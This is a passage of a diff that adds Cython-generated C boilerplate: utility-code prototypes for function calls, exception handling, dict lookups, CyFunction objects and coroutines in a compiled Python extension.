CYTHON_FAST_PYCALL +#if !CYTHON_VECTORCALL +#define __Pyx_PyFunction_FastCall(func, args, nargs)\ + __Pyx_PyFunction_FastCallDict((func), (args), (nargs), NULL) +static PyObject *__Pyx_PyFunction_FastCallDict(PyObject *func, PyObject **args, Py_ssize_t nargs, PyObject *kwargs); +#endif +#define __Pyx_BUILD_ASSERT_EXPR(cond)\ + (sizeof(char [1 - 2*!(cond)]) - 1) +#ifndef Py_MEMBER_SIZE +#define Py_MEMBER_SIZE(type, member) sizeof(((type *)0)->member) +#endif +#if !CYTHON_VECTORCALL +#if PY_VERSION_HEX >= 0x03080000 + #include "frameobject.h" +#if PY_VERSION_HEX >= 0x030b00a6 + #ifndef Py_BUILD_CORE + #define Py_BUILD_CORE 1 + #endif + #include "internal/pycore_frame.h" +#endif + #define __Pxy_PyFrame_Initialize_Offsets() + #define __Pyx_PyFrame_GetLocalsplus(frame) ((frame)->f_localsplus) +#else + static size_t __pyx_pyframe_localsplus_offset = 0; + #include "frameobject.h" + #define __Pxy_PyFrame_Initialize_Offsets()\ + ((void)__Pyx_BUILD_ASSERT_EXPR(sizeof(PyFrameObject) == offsetof(PyFrameObject, f_localsplus) + Py_MEMBER_SIZE(PyFrameObject, f_localsplus)),\ + (void)(__pyx_pyframe_localsplus_offset = ((size_t)PyFrame_Type.tp_basicsize) - Py_MEMBER_SIZE(PyFrameObject, f_localsplus))) + #define __Pyx_PyFrame_GetLocalsplus(frame)\ + (assert(__pyx_pyframe_localsplus_offset), (PyObject **)(((char *)(frame)) + __pyx_pyframe_localsplus_offset)) +#endif +#endif +#endif + +/* PyObjectCall.proto */ +#if CYTHON_COMPILING_IN_CPYTHON +static CYTHON_INLINE PyObject* __Pyx_PyObject_Call(PyObject *func, PyObject *arg, PyObject *kw); +#else +#define __Pyx_PyObject_Call(func, arg, kw) PyObject_Call(func, arg, kw) +#endif + +/* PyObjectCallMethO.proto */ +#if CYTHON_COMPILING_IN_CPYTHON +static CYTHON_INLINE PyObject* __Pyx_PyObject_CallMethO(PyObject *func, PyObject *arg); +#endif + +/* PyObjectFastCall.proto */ +#define __Pyx_PyObject_FastCall(func, args, nargs) __Pyx_PyObject_FastCallDict(func, args, (size_t)(nargs), NULL) +static CYTHON_INLINE PyObject* __Pyx_PyObject_FastCallDict(PyObject *func, PyObject **args, size_t nargs, PyObject *kwargs); + +/* PyObjectCallOneArg.proto */ +static CYTHON_INLINE PyObject* __Pyx_PyObject_CallOneArg(PyObject *func, PyObject *arg); + +/* PyObjectFormatSimple.proto */ +#if CYTHON_COMPILING_IN_PYPY + #define __Pyx_PyObject_FormatSimple(s, f) (\ + likely(PyUnicode_CheckExact(s)) ? (Py_INCREF(s), s) :\ + PyObject_Format(s, f)) +#elif PY_MAJOR_VERSION < 3 + #define __Pyx_PyObject_FormatSimple(s, f) (\ + likely(PyUnicode_CheckExact(s)) ? (Py_INCREF(s), s) :\ + likely(PyString_CheckExact(s)) ? PyUnicode_FromEncodedObject(s, NULL, "strict") :\ + PyObject_Format(s, f)) +#elif CYTHON_USE_TYPE_SLOTS + #define __Pyx_PyObject_FormatSimple(s, f) (\ + likely(PyUnicode_CheckExact(s)) ? (Py_INCREF(s), s) :\ + likely(PyLong_CheckExact(s)) ? PyLong_Type.tp_repr(s) :\ + likely(PyFloat_CheckExact(s)) ? PyFloat_Type.tp_repr(s) :\ + PyObject_Format(s, f)) +#else + #define __Pyx_PyObject_FormatSimple(s, f) (\ + likely(PyUnicode_CheckExact(s)) ? (Py_INCREF(s), s) :\ + PyObject_Format(s, f)) +#endif + +/* JoinPyUnicode.proto */ +static PyObject* __Pyx_PyUnicode_Join(PyObject* value_tuple, Py_ssize_t value_count, Py_ssize_t result_ulength, + Py_UCS4 max_char); + +/* GetException.proto */ +#if CYTHON_FAST_THREAD_STATE +#define __Pyx_GetException(type, value, tb) __Pyx__GetException(__pyx_tstate, type, value, tb) +static int __Pyx__GetException(PyThreadState *tstate, PyObject **type, PyObject **value, PyObject **tb); +#else +static int __Pyx_GetException(PyObject **type, PyObject **value, PyObject **tb); +#endif + +/* pep479.proto */ +static void __Pyx_Generator_Replace_StopIteration(int in_async_gen); + +/* RaiseTooManyValuesToUnpack.proto */ +static CYTHON_INLINE void __Pyx_RaiseTooManyValuesError(Py_ssize_t expected); + +/* RaiseNeedMoreValuesToUnpack.proto */ +static CYTHON_INLINE void __Pyx_RaiseNeedMoreValuesError(Py_ssize_t index); + +/* IterFinish.proto */ +static CYTHON_INLINE int __Pyx_IterFinish(void); + +/* UnpackItemEndCheck.proto */ +static int __Pyx_IternextUnpackEndCheck(PyObject *retval, Py_ssize_t expected); + +/* MoveIfSupported.proto */ +#if __cplusplus >= 201103L || (defined(_MSC_VER) && _MSC_VER >= 1600) + #include + #define __PYX_STD_MOVE_IF_SUPPORTED(x) std::move(x) +#else + #define __PYX_STD_MOVE_IF_SUPPORTED(x) x +#endif + +/* RaiseException.proto */ +static void __Pyx_Raise(PyObject *type, PyObject *value, PyObject *tb, PyObject *cause); + +/* DictGetItem.proto */ +#if PY_MAJOR_VERSION >= 3 && !CYTHON_COMPILING_IN_PYPY +static PyObject *__Pyx_PyDict_GetItem(PyObject *d, PyObject* key); +#define __Pyx_PyObject_Dict_GetItem(obj, name)\ + (likely(PyDict_CheckExact(obj)) ?\ + __Pyx_PyDict_GetItem(obj, name) : PyObject_GetItem(obj, name)) +#else +#define __Pyx_PyDict_GetItem(d, key) PyObject_GetItem(d, key) +#define __Pyx_PyObject_Dict_GetItem(obj, name) PyObject_GetItem(obj, name) +#endif + +/* GetItemInt.proto */ +#define __Pyx_GetItemInt(o, i, type, is_signed, to_py_func, is_list, wraparound, boundscheck)\ + (__Pyx_fits_Py_ssize_t(i, type, is_signed) ?\ + __Pyx_GetItemInt_Fast(o, (Py_ssize_t)i, is_list, wraparound, boundscheck) :\ + (is_list ? (PyErr_SetString(PyExc_IndexError, "list index out of range"), (PyObject*)NULL) :\ + __Pyx_GetItemInt_Generic(o, to_py_func(i)))) +#define __Pyx_GetItemInt_List(o, i, type, is_signed, to_py_func, is_list, wraparound, boundscheck)\ + (__Pyx_fits_Py_ssize_t(i, type, is_signed) ?\ + __Pyx_GetItemInt_List_Fast(o, (Py_ssize_t)i, wraparound, boundscheck) :\ + (PyErr_SetString(PyExc_IndexError, "list index out of range"), (PyObject*)NULL)) +static CYTHON_INLINE PyObject *__Pyx_GetItemInt_List_Fast(PyObject *o, Py_ssize_t i, + int wraparound, int boundscheck); +#define __Pyx_GetItemInt_Tuple(o, i, type, is_signed, to_py_func, is_list, wraparound, boundscheck)\ + (__Pyx_fits_Py_ssize_t(i, type, is_signed) ?\ + __Pyx_GetItemInt_Tuple_Fast(o, (Py_ssize_t)i, wraparound, boundscheck) :\ + (PyErr_SetString(PyExc_IndexError, "tuple index out of range"), (PyObject*)NULL)) +static CYTHON_INLINE PyObject *__Pyx_GetItemInt_Tuple_Fast(PyObject *o, Py_ssize_t i, + int wraparound, int boundscheck); +static PyObject *__Pyx_GetItemInt_Generic(PyObject *o, PyObject* j); +static CYTHON_INLINE PyObject *__Pyx_GetItemInt_Fast(PyObject *o, Py_ssize_t i, + int is_list, int wraparound, int boundscheck); + +/* PyDictVersioning.proto */ +#if CYTHON_USE_DICT_VERSIONS && CYTHON_USE_TYPE_SLOTS +#define __PYX_DICT_VERSION_INIT ((PY_UINT64_T) -1) +#define __PYX_GET_DICT_VERSION(dict) (((PyDictObject*)(dict))->ma_version_tag) +#define __PYX_UPDATE_DICT_CACHE(dict, value, cache_var, version_var)\ + (version_var) = __PYX_GET_DICT_VERSION(dict);\ + (cache_var) = (value); +#define __PYX_PY_DICT_LOOKUP_IF_MODIFIED(VAR, DICT, LOOKUP) {\ + static PY_UINT64_T __pyx_dict_version = 0;\ + static PyObject *__pyx_dict_cached_value = NULL;\ + if (likely(__PYX_GET_DICT_VERSION(DICT) == __pyx_dict_version)) {\ + (VAR) = __pyx_dict_cached_value;\ + } else {\ + (VAR) = __pyx_dict_cached_value = (LOOKUP);\ + __pyx_dict_version = __PYX_GET_DICT_VERSION(DICT);\ + }\ +} +static CYTHON_INLINE PY_UINT64_T __Pyx_get_tp_dict_version(PyObject *obj); +static CYTHON_INLINE PY_UINT64_T __Pyx_get_object_dict_version(PyObject *obj); +static CYTHON_INLINE int __Pyx_object_dict_version_matches(PyObject* obj, PY_UINT64_T tp_dict_version, PY_UINT64_T obj_dict_version); +#else +#define __PYX_GET_DICT_VERSION(dict) (0) +#define __PYX_UPDATE_DICT_CACHE(dict, value, cache_var, version_var) +#define __PYX_PY_DICT_LOOKUP_IF_MODIFIED(VAR, DICT, LOOKUP) (VAR) = (LOOKUP); +#endif + +/* GetModuleGlobalName.proto */ +#if CYTHON_USE_DICT_VERSIONS +#define __Pyx_GetModuleGlobalName(var, name) do {\ + static PY_UINT64_T __pyx_dict_version = 0;\ + static PyObject *__pyx_dict_cached_value = NULL;\ + (var) = (likely(__pyx_dict_version == __PYX_GET_DICT_VERSION(__pyx_d))) ?\ + (likely(__pyx_dict_cached_value) ? __Pyx_NewRef(__pyx_dict_cached_value) : __Pyx_GetBuiltinName(name)) :\ + __Pyx__GetModuleGlobalName(name, &__pyx_dict_version, &__pyx_dict_cached_value);\ +} while(0) +#define __Pyx_GetModuleGlobalNameUncached(var, name) do {\ + PY_UINT64_T __pyx_dict_version;\ + PyObject *__pyx_dict_cached_value;\ + (var) = __Pyx__GetModuleGlobalName(name, &__pyx_dict_version, &__pyx_dict_cached_value);\ +} while(0) +static PyObject *__Pyx__GetModuleGlobalName(PyObject *name, PY_UINT64_T *dict_version, PyObject **dict_cached_value); +#else +#define __Pyx_GetModuleGlobalName(var, name) (var) = __Pyx__GetModuleGlobalName(name) +#define __Pyx_GetModuleGlobalNameUncached(var, name) (var) = __Pyx__GetModuleGlobalName(name) +static CYTHON_INLINE PyObject *__Pyx__GetModuleGlobalName(PyObject *name); +#endif + +/* dict_getitem_default.proto */ +static PyObject* __Pyx_PyDict_GetItemDefault(PyObject* d, PyObject* key, PyObject* default_value); + +/* UnpackUnboundCMethod.proto */ +typedef struct { + PyObject *type; + PyObject **method_name; + PyCFunction func; + PyObject *method; + int flag; +} __Pyx_CachedCFunction; + +/* CallUnboundCMethod1.proto */ +static PyObject* __Pyx__CallUnboundCMethod1(__Pyx_CachedCFunction* cfunc, PyObject* self, PyObject* arg); +#if CYTHON_COMPILING_IN_CPYTHON +static CYTHON_INLINE PyObject* __Pyx_CallUnboundCMethod1(__Pyx_CachedCFunction* cfunc, PyObject* self, PyObject* arg); +#else +#define __Pyx_CallUnboundCMethod1(cfunc, self, arg) __Pyx__CallUnboundCMethod1(cfunc, self, arg) +#endif + +/* CallUnboundCMethod2.proto */ +static PyObject* __Pyx__CallUnboundCMethod2(__Pyx_CachedCFunction* cfunc, PyObject* self, PyObject* arg1, PyObject* arg2); +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX >= 0x030600B1 +static CYTHON_INLINE PyObject *__Pyx_CallUnboundCMethod2(__Pyx_CachedCFunction *cfunc, PyObject *self, PyObject *arg1, PyObject *arg2); +#else +#define __Pyx_CallUnboundCMethod2(cfunc, self, arg1, arg2) __Pyx__CallUnboundCMethod2(cfunc, self, arg1, arg2) +#endif + +/* PyDictContains.proto */ +static CYTHON_INLINE int __Pyx_PyDict_ContainsTF(PyObject* item, PyObject* dict, int eq) { + int result = PyDict_Contains(dict, item); + return unlikely(result < 0) ? result : (result == (eq == Py_EQ)); +} + +/* PySequenceContains.proto */ +static CYTHON_INLINE int __Pyx_PySequence_ContainsTF(PyObject* item, PyObject* seq, int eq) { + int result = PySequence_Contains(seq, item); + return unlikely(result < 0) ? result : (result == (eq == Py_EQ)); +} + +/* SetItemInt.proto */ +#define __Pyx_SetItemInt(o, i, v, type, is_signed, to_py_func, is_list, wraparound, boundscheck)\ + (__Pyx_fits_Py_ssize_t(i, type, is_signed) ?\ + __Pyx_SetItemInt_Fast(o, (Py_ssize_t)i, v, is_list, wraparound, boundscheck) :\ + (is_list ? (PyErr_SetString(PyExc_IndexError, "list assignment index out of range"), -1) :\ + __Pyx_SetItemInt_Generic(o, to_py_func(i), v))) +static int __Pyx_SetItemInt_Generic(PyObject *o, PyObject *j, PyObject *v); +static CYTHON_INLINE int __Pyx_SetItemInt_Fast(PyObject *o, Py_ssize_t i, PyObject *v, + int is_list, int wraparound, int boundscheck); + +/* PyUnicode_Unicode.proto */ +static CYTHON_INLINE PyObject* __Pyx_PyUnicode_Unicode(PyObject *obj); + +/* PyObjectCallNoArg.proto */ +static CYTHON_INLINE PyObject* __Pyx_PyObject_CallNoArg(PyObject *func); + +/* PyObjectGetMethod.proto */ +static int __Pyx_PyObject_GetMethod(PyObject *obj, PyObject *name, PyObject **method); + +/* PyObjectCallMethod0.proto */ +static PyObject* __Pyx_PyObject_CallMethod0(PyObject* obj, PyObject* method_name); + +/* RaiseNoneIterError.proto */ +static CYTHON_INLINE void __Pyx_RaiseNoneNotIterableError(void); + +/* UnpackTupleError.proto */ +static void __Pyx_UnpackTupleError(PyObject *, Py_ssize_t index); + +/* UnpackTuple2.proto */ +#define __Pyx_unpack_tuple2(tuple, value1, value2, is_tuple, has_known_size, decref_tuple)\ + (likely(is_tuple || PyTuple_Check(tuple)) ?\ + (likely(has_known_size || PyTuple_GET_SIZE(tuple) == 2) ?\ + __Pyx_unpack_tuple2_exact(tuple, value1, value2, decref_tuple) :\ + (__Pyx_UnpackTupleError(tuple, 2), -1)) :\ + __Pyx_unpack_tuple2_generic(tuple, value1, value2, has_known_size, decref_tuple)) +static CYTHON_INLINE int __Pyx_unpack_tuple2_exact( + PyObject* tuple, PyObject** value1, PyObject** value2, int decref_tuple); +static int __Pyx_unpack_tuple2_generic( + PyObject* tuple, PyObject** value1, PyObject** value2, int has_known_size, int decref_tuple); + +/* dict_iter.proto */ +static CYTHON_INLINE PyObject* __Pyx_dict_iterator(PyObject* dict, int is_dict, PyObject* method_name, + Py_ssize_t* p_orig_length, int* p_is_dict); +static CYTHON_INLINE int __Pyx_dict_iter_next(PyObject* dict_or_iter, Py_ssize_t orig_length, Py_ssize_t* ppos, + PyObject** pkey, PyObject** pvalue, PyObject** pitem, int is_dict); + +/* KeywordStringCheck.proto */ +static int __Pyx_CheckKeywordStrings(PyObject *kw, const char* function_name, int kw_allowed); + +/* ObjectGetItem.proto */ +#if CYTHON_USE_TYPE_SLOTS +static CYTHON_INLINE PyObject *__Pyx_PyObject_GetItem(PyObject *obj, PyObject *key); +#else +#define __Pyx_PyObject_GetItem(obj, key) PyObject_GetItem(obj, key) +#endif + +/* RaiseUnexpectedTypeError.proto */ +static int __Pyx_RaiseUnexpectedTypeError(const char *expected, PyObject *obj); + +/* IncludeStructmemberH.proto */ +#include + +/* FixUpExtensionType.proto */ +#if CYTHON_USE_TYPE_SPECS +static int __Pyx_fix_up_extension_type_from_spec(PyType_Spec *spec, PyTypeObject *type); +#endif + +/* ValidateBasesTuple.proto */ +#if CYTHON_COMPILING_IN_CPYTHON || CYTHON_COMPILING_IN_LIMITED_API || CYTHON_USE_TYPE_SPECS +static int __Pyx_validate_bases_tuple(const char *type_name, Py_ssize_t dictoffset, PyObject *bases); +#endif + +/* PyType_Ready.proto */ +CYTHON_UNUSED static int __Pyx_PyType_Ready(PyTypeObject *t); + +/* PyObject_GenericGetAttrNoDict.proto */ +#if CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP && PY_VERSION_HEX < 0x03070000 +static CYTHON_INLINE PyObject* __Pyx_PyObject_GenericGetAttrNoDict(PyObject* obj, PyObject* attr_name); +#else +#define __Pyx_PyObject_GenericGetAttrNoDict PyObject_GenericGetAttr +#endif + +/* PyObject_GenericGetAttr.proto */ +#if CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP && PY_VERSION_HEX < 0x03070000 +static PyObject* __Pyx_PyObject_GenericGetAttr(PyObject* obj, PyObject* attr_name); +#else +#define __Pyx_PyObject_GenericGetAttr PyObject_GenericGetAttr +#endif + +/* SetupReduce.proto */ +#if !CYTHON_COMPILING_IN_LIMITED_API +static int __Pyx_setup_reduce(PyObject* type_obj); +#endif + +/* Import.proto */ +static PyObject *__Pyx_Import(PyObject *name, PyObject *from_list, int level); + +/* ImportDottedModule.proto */ +static PyObject *__Pyx_ImportDottedModule(PyObject *name, PyObject *parts_tuple); +#if PY_MAJOR_VERSION >= 3 +static PyObject *__Pyx_ImportDottedModule_WalkParts(PyObject *module, PyObject *name, PyObject *parts_tuple); +#endif + +/* ImportFrom.proto */ +static PyObject* __Pyx_ImportFrom(PyObject* module, PyObject* name); + +/* FetchSharedCythonModule.proto */ +static PyObject *__Pyx_FetchSharedCythonABIModule(void); + +/* FetchCommonType.proto */ +#if !CYTHON_USE_TYPE_SPECS +static PyTypeObject* __Pyx_FetchCommonType(PyTypeObject* type); +#else +static PyTypeObject* __Pyx_FetchCommonTypeFromSpec(PyObject *module, PyType_Spec *spec, PyObject *bases); +#endif + +/* PyMethodNew.proto */ +#if PY_MAJOR_VERSION >= 3 +static PyObject *__Pyx_PyMethod_New(PyObject *func, PyObject *self, PyObject *typ) { + CYTHON_UNUSED_VAR(typ); + if (!self) + return __Pyx_NewRef(func); + return PyMethod_New(func, self); +} +#else + #define __Pyx_PyMethod_New PyMethod_New +#endif + +/* PyVectorcallFastCallDict.proto */ +#if CYTHON_METH_FASTCALL +static CYTHON_INLINE PyObject *__Pyx_PyVectorcall_FastCallDict(PyObject *func, __pyx_vectorcallfunc vc, PyObject *const *args, size_t nargs, PyObject *kw); +#endif + +/* CythonFunctionShared.proto */ +#define __Pyx_CyFunction_USED +#define __Pyx_CYFUNCTION_STATICMETHOD 0x01 +#define __Pyx_CYFUNCTION_CLASSMETHOD 0x02 +#define __Pyx_CYFUNCTION_CCLASS 0x04 +#define __Pyx_CYFUNCTION_COROUTINE 0x08 +#define __Pyx_CyFunction_GetClosure(f)\ + (((__pyx_CyFunctionObject *) (f))->func_closure) +#if PY_VERSION_HEX < 0x030900B1 + #define __Pyx_CyFunction_GetClassObj(f)\ + (((__pyx_CyFunctionObject *) (f))->func_classobj) +#else + #define __Pyx_CyFunction_GetClassObj(f)\ + ((PyObject*) ((PyCMethodObject *) (f))->mm_class) +#endif +#define __Pyx_CyFunction_SetClassObj(f, classobj)\ + __Pyx__CyFunction_SetClassObj((__pyx_CyFunctionObject *) (f), (classobj)) +#define __Pyx_CyFunction_Defaults(type, f)\ + ((type *)(((__pyx_CyFunctionObject *) (f))->defaults)) +#define __Pyx_CyFunction_SetDefaultsGetter(f, g)\ + ((__pyx_CyFunctionObject *) (f))->defaults_getter = (g) +typedef struct { +#if PY_VERSION_HEX < 0x030900B1 + PyCFunctionObject func; +#else + PyCMethodObject func; +#endif +#if CYTHON_BACKPORT_VECTORCALL + __pyx_vectorcallfunc func_vectorcall; +#endif +#if PY_VERSION_HEX < 0x030500A0 + PyObject *func_weakreflist; +#endif + PyObject *func_dict; + PyObject *func_name; + PyObject *func_qualname; + PyObject *func_doc; + PyObject *func_globals; + PyObject *func_code; + PyObject *func_closure; +#if PY_VERSION_HEX < 0x030900B1 + PyObject *func_classobj; +#endif + void *defaults; + int defaults_pyobjects; + size_t defaults_size; // used by FusedFunction for copying defaults + int flags; + PyObject *defaults_tuple; + PyObject *defaults_kwdict; + PyObject *(*defaults_getter)(PyObject *); + PyObject *func_annotations; + PyObject *func_is_coroutine; +} __pyx_CyFunctionObject; +#define __Pyx_CyFunction_Check(obj) __Pyx_TypeCheck(obj, __pyx_CyFunctionType) +#define __Pyx_IsCyOrPyCFunction(obj) __Pyx_TypeCheck2(obj, __pyx_CyFunctionType, &PyCFunction_Type) +#define __Pyx_CyFunction_CheckExact(obj) __Pyx_IS_TYPE(obj, __pyx_CyFunctionType) +static PyObject *__Pyx_CyFunction_Init(__pyx_CyFunctionObject* op, PyMethodDef *ml, + int flags, PyObject* qualname, + PyObject *closure, + PyObject *module, PyObject *globals, + PyObject* code); +static CYTHON_INLINE void __Pyx__CyFunction_SetClassObj(__pyx_CyFunctionObject* f, PyObject* classobj); +static CYTHON_INLINE void *__Pyx_CyFunction_InitDefaults(PyObject *m, + size_t size, + int pyobjects); +static CYTHON_INLINE void __Pyx_CyFunction_SetDefaultsTuple(PyObject *m, + PyObject *tuple); +static CYTHON_INLINE void __Pyx_CyFunction_SetDefaultsKwDict(PyObject *m, + PyObject *dict); +static CYTHON_INLINE void __Pyx_CyFunction_SetAnnotationsDict(PyObject *m, + PyObject *dict); +static int __pyx_CyFunction_init(PyObject *module); +#if CYTHON_METH_FASTCALL +static PyObject * __Pyx_CyFunction_Vectorcall_NOARGS(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames); +static PyObject * __Pyx_CyFunction_Vectorcall_O(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames); +static PyObject * __Pyx_CyFunction_Vectorcall_FASTCALL_KEYWORDS(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames); +static PyObject * __Pyx_CyFunction_Vectorcall_FASTCALL_KEYWORDS_METHOD(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames); +#if CYTHON_BACKPORT_VECTORCALL +#define __Pyx_CyFunction_func_vectorcall(f) (((__pyx_CyFunctionObject*)f)->func_vectorcall) +#else +#define __Pyx_CyFunction_func_vectorcall(f) (((PyCFunctionObject*)f)->vectorcall) +#endif +#endif + +/* CythonFunction.proto */ +static PyObject *__Pyx_CyFunction_New(PyMethodDef *ml, + int flags, PyObject* qualname, + PyObject *closure, + PyObject *module, PyObject *globals, + PyObject* code); + +/* CLineInTraceback.proto */ +#ifdef CYTHON_CLINE_IN_TRACEBACK +#define __Pyx_CLineForTraceback(tstate, c_line) (((CYTHON_CLINE_IN_TRACEBACK)) ? c_line : 0) +#else +static int __Pyx_CLineForTraceback(PyThreadState *tstate, int c_line); +#endif + +/* CodeObjectCache.proto */ +#if !CYTHON_COMPILING_IN_LIMITED_API +typedef struct { + PyCodeObject* code_object; + int code_line; +} __Pyx_CodeObjectCacheEntry; +struct __Pyx_CodeObjectCache { + int count; + int max_count; + __Pyx_CodeObjectCacheEntry* entries; +}; +static struct __Pyx_CodeObjectCache __pyx_code_cache = {0,0,NULL}; +static int __pyx_bisect_code_objects(__Pyx_CodeObjectCacheEntry* entries, int count, int code_line); +static PyCodeObject *__pyx_find_code_object(int code_line); +static void __pyx_insert_code_object(int code_line, PyCodeObject* code_object); +#endif + +/* AddTraceback.proto */ +static void __Pyx_AddTraceback(const char *funcname, int c_line, + int py_line, const char *filename); + +/* None.proto */ +#include + +/* GCCDiagnostics.proto */ +#if !defined(__INTEL_COMPILER) && defined(__GNUC__) && (__GNUC__ > 4 || (__GNUC__ == 4 && __GNUC_MINOR__ >= 6)) +#define __Pyx_HAS_GCC_DIAGNOSTIC +#endif + +/* CppExceptionConversion.proto */ +#ifndef __Pyx_CppExn2PyErr +#include +#include +#include +#include +static void __Pyx_CppExn2PyErr() { + try { + if (PyErr_Occurred()) + ; // let the latest Python exn pass through and ignore the current one + else + throw; + } catch (const std::bad_alloc& exn) { + PyErr_SetString(PyExc_MemoryError, exn.what()); + } catch (const std::bad_cast& exn) { + PyErr_SetString(PyExc_TypeError, exn.what()); + } catch (const std::bad_typeid& exn) { + PyErr_SetString(PyExc_TypeError, exn.what()); + } catch (const std::domain_error& exn) { + PyErr_SetString(PyExc_ValueError, exn.what()); + } catch (const std::invalid_argument& exn) { + PyErr_SetString(PyExc_ValueError, exn.what()); + } catch (const std::ios_base::failure& exn) { + PyErr_SetString(PyExc_IOError, exn.what()); + } catch (const std::out_of_range& exn) { + PyErr_SetString(PyExc_IndexError, exn.what()); + } catch (const std::overflow_error& exn) { + PyErr_SetString(PyExc_OverflowError, exn.what()); + } catch (const std::range_error& exn) { + PyErr_SetString(PyExc_ArithmeticError, exn.what()); + } catch (const std::underflow_error& exn) { + PyErr_SetString(PyExc_ArithmeticError, exn.what()); + } catch (const std::exception& exn) { + PyErr_SetString(PyExc_RuntimeError, exn.what()); + } + catch (...) + { + PyErr_SetString(PyExc_RuntimeError, "Unknown exception"); + } +} +#endif + +/* CIntFromPy.proto */ +static CYTHON_INLINE size_t __Pyx_PyInt_As_size_t(PyObject *); + +/* CIntToPy.proto */ +static CYTHON_INLINE PyObject* __Pyx_PyInt_From_uint32_t(uint32_t value); + +/* CIntToPy.proto */ +static CYTHON_INLINE PyObject* __Pyx_PyInt_From_long(long value); + +/* CIntFromPy.proto */ +static CYTHON_INLINE uint32_t __Pyx_PyInt_As_uint32_t(PyObject *); + +/* CIntFromPy.proto */ +static CYTHON_INLINE int __Pyx_PyInt_As_int(PyObject *); + +/* CIntToPy.proto */ +static CYTHON_INLINE PyObject* __Pyx_PyInt_From_uint64_t(uint64_t value); + +/* FormatTypeName.proto */ +#if CYTHON_COMPILING_IN_LIMITED_API +typedef PyObject *__Pyx_TypeName; +#define __Pyx_FMT_TYPENAME "%U" +static __Pyx_TypeName __Pyx_PyType_GetName(PyTypeObject* tp); +#define __Pyx_DECREF_TypeName(obj) Py_XDECREF(obj) +#else +typedef const char *__Pyx_TypeName; +#define __Pyx_FMT_TYPENAME "%.200s" +#define __Pyx_PyType_GetName(tp) ((tp)->tp_name) +#define __Pyx_DECREF_TypeName(obj) +#endif + +/* CIntFromPy.proto */ +static CYTHON_INLINE long __Pyx_PyInt_As_long(PyObject *); + +/* FastTypeChecks.proto */ +#if CYTHON_COMPILING_IN_CPYTHON +#define __Pyx_TypeCheck(obj, type) __Pyx_IsSubtype(Py_TYPE(obj), (PyTypeObject *)type) +#define __Pyx_TypeCheck2(obj, type1, type2) __Pyx_IsAnySubtype2(Py_TYPE(obj), (PyTypeObject *)type1, (PyTypeObject *)type2) +static CYTHON_INLINE int __Pyx_IsSubtype(PyTypeObject *a, PyTypeObject *b); +static CYTHON_INLINE int __Pyx_IsAnySubtype2(PyTypeObject *cls, PyTypeObject *a, PyTypeObject *b); +static CYTHON_INLINE int __Pyx_PyErr_GivenExceptionMatches(PyObject *err, PyObject *type); +static CYTHON_INLINE int __Pyx_PyErr_GivenExceptionMatches2(PyObject *err, PyObject *type1, PyObject *type2); +#else +#define __Pyx_TypeCheck(obj, type) PyObject_TypeCheck(obj, (PyTypeObject *)type) +#define __Pyx_TypeCheck2(obj, type1, type2) (PyObject_TypeCheck(obj, (PyTypeObject *)type1) || PyObject_TypeCheck(obj, (PyTypeObject *)type2)) +#define __Pyx_PyErr_GivenExceptionMatches(err, type) PyErr_GivenExceptionMatches(err, type) +#define __Pyx_PyErr_GivenExceptionMatches2(err, type1, type2) (PyErr_GivenExceptionMatches(err, type1) || PyErr_GivenExceptionMatches(err, type2)) +#endif +#define __Pyx_PyErr_ExceptionMatches2(err1, err2) __Pyx_PyErr_GivenExceptionMatches2(__Pyx_PyErr_CurrentExceptionType(), err1, err2) +#define __Pyx_PyException_Check(obj) __Pyx_TypeCheck(obj, PyExc_Exception) + +/* GetTopmostException.proto */ +#if CYTHON_USE_EXC_INFO_STACK && CYTHON_FAST_THREAD_STATE +static _PyErr_StackItem * __Pyx_PyErr_GetTopmostException(PyThreadState *tstate); +#endif + +/* SaveResetException.proto */ +#if CYTHON_FAST_THREAD_STATE +#define __Pyx_ExceptionSave(type, value, tb) __Pyx__ExceptionSave(__pyx_tstate, type, value, tb) +static CYTHON_INLINE void __Pyx__ExceptionSave(PyThreadState *tstate, PyObject **type, PyObject **value, PyObject **tb); +#define __Pyx_ExceptionReset(type, value, tb) __Pyx__ExceptionReset(__pyx_tstate, type, value, tb) +static CYTHON_INLINE void __Pyx__ExceptionReset(PyThreadState *tstate, PyObject *type, PyObject *value, PyObject *tb); +#else +#define __Pyx_ExceptionSave(type, value, tb) PyErr_GetExcInfo(type, value, tb) +#define __Pyx_ExceptionReset(type, value, tb) PyErr_SetExcInfo(type, value, tb) +#endif + +/* SwapException.proto */ +#if CYTHON_FAST_THREAD_STATE +#define __Pyx_ExceptionSwap(type, value, tb) __Pyx__ExceptionSwap(__pyx_tstate, type, value, tb) +static CYTHON_INLINE void __Pyx__ExceptionSwap(PyThreadState *tstate, PyObject **type, PyObject **value, PyObject **tb); +#else +static CYTHON_INLINE void __Pyx_ExceptionSwap(PyObject **type, PyObject **value, PyObject **tb); +#endif + +/* PyObjectCall2Args.proto */ +static CYTHON_INLINE PyObject* __Pyx_PyObject_Call2Args(PyObject* function, PyObject* arg1, PyObject* arg2); + +/* PyObjectCallMethod1.proto */ +static PyObject* __Pyx_PyObject_CallMethod1(PyObject* obj, PyObject* method_name, PyObject* arg); + +/* CoroutineBase.proto */ +struct __pyx_CoroutineObject; +typedef PyObject *(*__pyx_coroutine_body_t)(struct __pyx_CoroutineObject *, PyThreadState *, PyObject *); +#if CYTHON_USE_EXC_INFO_STACK +#define __Pyx_ExcInfoStruct _PyErr_StackItem +#else +typedef struct { + PyObject *exc_type; + PyObject *exc_value; + PyObject *exc_traceback; +} __Pyx_ExcInfoStruct; +#endif +typedef struct __pyx_CoroutineObject { + PyObject_HEAD + __pyx_coroutine_body_t body; + PyObject *closure; + __Pyx_ExcInfoStruct gi_exc_state; + PyObject *gi_weakreflist; + PyObject *classobj; + PyObject *yieldfrom; + PyObject *gi_name; + PyObject *gi_qualname; + PyObject *gi_modulename; + PyObject *gi_code; + PyObject *gi_frame; + int resume_label; + char is_running; +} __pyx_CoroutineObject; +static __pyx_CoroutineObject *__Pyx__Coroutine_New( + PyTypeObject *type, __pyx_coroutine_body_t body, PyObject *code, PyObject *closure, + PyObject *name, PyObject *qualname, PyObject *module_name); +static __pyx_CoroutineObject 